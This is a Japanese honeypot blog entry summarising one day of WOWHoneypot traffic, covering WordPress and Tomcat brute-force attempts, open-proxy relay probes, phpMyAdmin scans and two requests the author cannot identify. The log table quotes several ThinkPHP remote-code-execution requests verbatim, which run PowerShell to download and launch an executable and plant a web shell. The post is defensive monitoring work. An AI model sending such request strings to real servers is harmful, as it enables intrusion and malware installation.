23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(14日目)

2019/03/30(土)

トータルは1817件でした。
昨日より優しい。

件数 概要 リクエス
449 WordPressの調査 POST /wp-login.php
449 WordPressブルートフォース攻撃 GET /wp-login.php
446 WordPress の Pingback を狙ったブルートフォース攻撃 POST /xmlrpc.php
391 Tomcat管理ページへ対するブルートフォース攻撃 GET /manager/html
48 アクセス GET /
1 三者中継攻撃 GET http[:]//www.ip.cn/
1 三者中継攻撃 GET http[:]//www.baidu.com/?rands=_5652281164324840809120
1 三者中継攻撃 GET http[:]//www.baidu.com/?rands=_164429264410929121660960
1 三者中継攻撃 GET http[:]//www.123cha.com/
1 三者中継攻撃 GET http[:]//www.123cha.com
1 三者中継攻撃 GET http[:]//api.ipify.org/
1 三者中継攻撃 GET http[:]//157.52.156.49:42788/vs.php?rands=_54563491281844691727800
1 三者中継攻撃 GET http[:]//157.52.156.49:42788/vs.php?rands=_144660032010586882376240
1 三者中継攻撃 GET http[:]//104.148.42.211:42788/gvs.php?rands=_1553459910413848123488496
1 三者中継攻撃 GET http[:]//104.148.42.211:42788/gvs.php?rands=_1294551740810910642537088
1 WordPressの調査 GET /vlog/wp-login.php
1 WordPressの調査 GET /vlog//wp-json/wp/v2/users/
1 WordPressの調査 GET /vlog//?author=1
1 WordPressの調査 GET /shop/wp-login.php
1 WordPressの調査 GET /shop//wp-json/wp/v2/users/
1 WordPressの調査 GET /shop//?author=1
1 不明(調査?) GET /script
1 ThinkPHPの脆弱性を突いた攻撃 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','C:/Windows/temp/qlhgfagbnvqfdyu25575.exe');start%20C:/Windows/temp/qlhgfagbnvqfdyu25575.exe
1 ThinkPHPの脆弱性を突いた攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1 ThinkPHPの脆弱性を突いた攻撃 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','C:/Windows/temp/qlhgfagbnvqfdyu25575.exe');start%20C:/Windows/temp/qlhgfagbnvqfdyu25575.exe
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 不明(第三者中継攻撃の調査?) GET /legal-notice/
1 WordPressの調査 GET /forum/wp-login.php
1 WordPressの調査 GET /forum//wp-json/wp/v2/users/
1 WordPressの調査 GET /forum//?author=1
1 WordPressの調査 GET /blog/wp-login.php
1 WordPressの調査 GET /blog//wp-json/wp/v2/users/
1 WordPressの調査 GET /blog//?author=1
1 FreePBXの調査 GET /admin/assets/js/views/login.js
1 三者中継攻撃 CONNECT www.baidu.com:443
1 三者中継攻撃 CONNECT www.baidu.com
1 三者中継攻撃 CONNECT cn.bing.com:443

1件不明なものがありました。

GET /script HTTP/1.1
Host: ***.***.***.***:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.13rc1 Windows/7

こちらはSec-Owlさんのハニーポットでも過去に観測していたみたいですね。
User-Agentがpythonで1IPから1件という部分まで共通していました。
sec-owl.hatenablog.com



これも謎です。。。
1IPから1件の通信でした。
三者中継攻撃の調査なんですかね。。?
よくわからなかったのでわかる方いたら教えていただきたいです。

GET /legal-notice/ HTTP/1.1
Host: www.payback-ltd.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36